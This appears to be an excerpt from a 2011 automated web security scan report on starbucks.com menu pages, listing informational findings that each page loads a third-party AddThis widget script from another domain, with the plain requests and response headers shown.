<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:32:50 GMT
Connection: close
Content-Length: 44514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:20 GMT
Connection: close
Content-Length: 45265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

Issue detail

The response dynamically includes the following script from another domain: http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:35 GMT
Connection: close
Content-Length: 45059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:29 GMT
Connection: close
Content-Length: 45088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:37 GMT
Connection: close
Content-Length: 45236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:45 GMT
Connection: close
Content-Length: 45078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:33:55 GMT
Connection: close
Content-Length: 45376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.154. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/caramel-apple-spice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/caramel-apple-spice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:11 GMT
Connection: close
Content-Length: 40960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.155. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/cold-apple-juice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/cold-apple-juice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:14 GMT
Connection: close
Content-Length: 40329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.156. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/flavored-steamed-milk

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/flavored-steamed-milk HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:24 GMT
Connection: close
Content-Length: 40994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.157. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/milk

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/milk HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:37 GMT
Connection: close
Content-Length: 40591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.158. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/kids-drinks-and-other/steamed-apple-juice

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/kids-drinks-and-other/steamed-apple-juice HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:38 GMT
Connection: close
Content-Length: 40405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.159. http://www.starbucks.com/menu/drinks/tazo-tea/awake

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/awake HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:49 GMT
Connection: close
Content-Length: 41941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.160. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/awake-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/awake-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:34:48 GMT
Connection: close
Content-Length: 42070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.161. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/black-shaken-iced-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/black-shaken-iced-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:35:58 GMT
Connection: close
Content-Length: 41948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.162. http://www.starbucks.com/menu/drinks/tazo-tea/calm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/calm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/calm HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:47 GMT
Connection: close
Content-Length: 41928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.163. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/chai-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/chai-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:49 GMT
Connection: close
Content-Length: 42202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.164. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/china-green-tips

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/china-green-tips HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:55 GMT
Connection: close
Content-Length: 41915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.165. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/earl-grey HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:56 GMT
Connection: close
Content-Length: 41950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.166. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/earl-grey-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/earl-grey-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
